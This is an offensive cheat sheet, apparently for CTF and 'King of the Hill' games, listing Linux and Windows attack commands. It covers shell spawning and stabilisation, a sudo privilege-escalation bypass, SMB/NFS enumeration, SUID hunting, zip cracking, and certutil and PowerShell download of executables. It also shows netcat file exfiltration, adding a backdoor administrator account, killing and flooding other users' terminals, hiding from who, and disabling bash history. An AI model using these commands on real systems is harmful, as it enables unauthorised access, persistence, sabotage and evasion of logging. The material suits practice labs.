# Linux ### Stablilize Shell 1. ctrl+z 2. stty raw -echo 3. fg (press enter x2) 4. export TERM=xterm , for using `clear` command ### Spawn bash * /usr/bin/script -qc /bin/bash 1&>/dev/null * python -c 'import pty;pty.spawn("/bin/bash")' * python3 -c 'import pty;pty.spawn("/bin/bash")' ### Vulnerable sudo version `sudo -u#-1 whoami` ### SMB Shares #### SmbClient * `smbclient -L \\\\\\` accessing a share anonymously * `smbclient \\\\10.10.209.122\\ -U `accessing a share with an authorized user #### Smbmap * `smbmap -u -p -H ` #### Smbget * `smbget -R smb:///` ### NFS shares * `showmount -e ` This lists the nfs shares * `mount -t nfs :/ ` Mounting that share ### Finding Binaries * find . - perm /4000 (user id uid) * find . -perm /2000 (group id guid) ### Changing file attributes chattr + i filename `making file immutable`
chattr -i filename `making file mutable`
lschattr filename `Checking file attributes` ### Uploading Files scp file/you/want `user@ip`:/path/to/store
python -m SimpleHTTPServer [port] `By default will listen on 8000`
python3 -m http.server [port] `By default will listen on 8000`
### Downloading Files wget http://:port/ ### Netcat to download files from target `nc -l -p [port] > file` Receive file
`nc -w 3 [ip] [port] < file `Send file
### Cracaking Zip Archive * `fcrackzip -u -D -p ` # Windows ### Adding User net user "USER_NAME" "PASS" /add ### Changing User's password net user "USER_NAME" "NEWPASS" ### Adding User to Administrators net localgroup administrators "USER_NAME" /add ### Changing File Permissions CACLS files /e /p {USERNAME}:{PERMISSION}
Permissions:
1.R `Read`
2.W `Write`
3.C `Change`
4.F `Full Control` ### Set File bits attrib +r filename `add read only bit`
attrib -r filename `remove read only bit`
attrib +h filename `add hidden bit `
attrib -h filename `remove hidden bit` ### Show hidden file/folder dir /a `show all hidden files & folder`
dir /a:d `show only hidden folder`
dir /a:h `show only hidden files`
### Downloading Files `certutil.exe -urlcache -f http://:/ ouput.exe`
`powershell -c "wget http://:/" -outfile output.exe` # Msfvenom ### List All Payloads msfvenom -l payloads ### List Payload Format msfvenom --list formats # Meterpreter ### Adding user for RDP run getgui -u [USER_NAME] -p [PASS] # King Of The Hill (KoTH) ### Monitoring and Closing Shell (Linux) * strace `debugging / tamper with processes` * gbd `c/c++ debugger` * script - records terminal activites * w /who `check current pts ,terminal device` * ps -t ps/pts-number `process monitoring` * script /dev/pts/pts-number `montior terminal` * cat /dev/urandom > /dev/pts/pts-number 2>/dev/null `prints arbitary text on terminal` * pkill -9 -t pts/pts-number ### Change SSH port `nano /etc/ssh/sshd_config` (change PORT 22 to any port you want also you can tinker with configuration file) ### Hide yourself from "w" or "who" `ssh user@ip -T` This -T will have some limiations , that you cannot run bash and some other commands but is helpful. ### Run Bash script on king.txt `while [ 1 ]; do /root/chattr -i king.txt; done &` ### Send messages to logged in users * echo "msg" > /dev/pts/pts-number `send message to specific user`
* wall msg `boradcast message to everyone`
### Closing Session (Windows) * quser * logoff id|user_name export HISTFILE=/dev/null found this it might help you out a little when doing KOTH it basically stops bash logging your commands in the ~/.bash_history file